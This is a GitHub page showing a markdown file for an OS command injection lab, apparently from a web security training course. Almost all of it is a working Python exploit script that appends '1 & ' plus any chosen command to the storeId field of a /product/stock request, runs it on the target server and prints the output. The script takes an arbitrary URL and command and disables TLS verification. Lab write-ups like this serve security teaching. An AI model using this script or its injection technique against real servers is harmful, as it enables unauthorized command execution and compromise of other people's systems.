Skip to content

Latest commit

 

History

History
43 lines (30 loc) · 1.02 KB

OS-COMMAND-INJECTION-LAB-01.md

File metadata and controls

43 lines (30 loc) · 1.02 KB

Script

import requests
import sys
import urllib3


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestsWarning)

proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


def run_command(url, command):
    stock_path = '/product/stock'
    command_injection = '1 & ' + command
    params = {'productId':'1','storeId': command_injection }
    r = requests.post(url + stock_path, data=params, verify=False, proxies=proxies)
    if (len(r.text) > 3):
        print("(+) Command Injection Successful")
        print("(+) Output of Command:"+ r.text)
    else:
        print("(+) Commmand Injection Failed")    

def main():
    if len(sys.argv) !=3:
       print("(+) Usage: %s <url> <command> " % sys.argv[0])
       print("(+) Example: %s www.example.com whoami" % sys.argv[0])
       sys.exit(-1)
       
    
    url = sys.argv[1]
    command = sys.argv[2]
    print("(+) Exploiting  Command Injection .....")
    run_command(url,command)   




if __name__ == "__main__":
      main()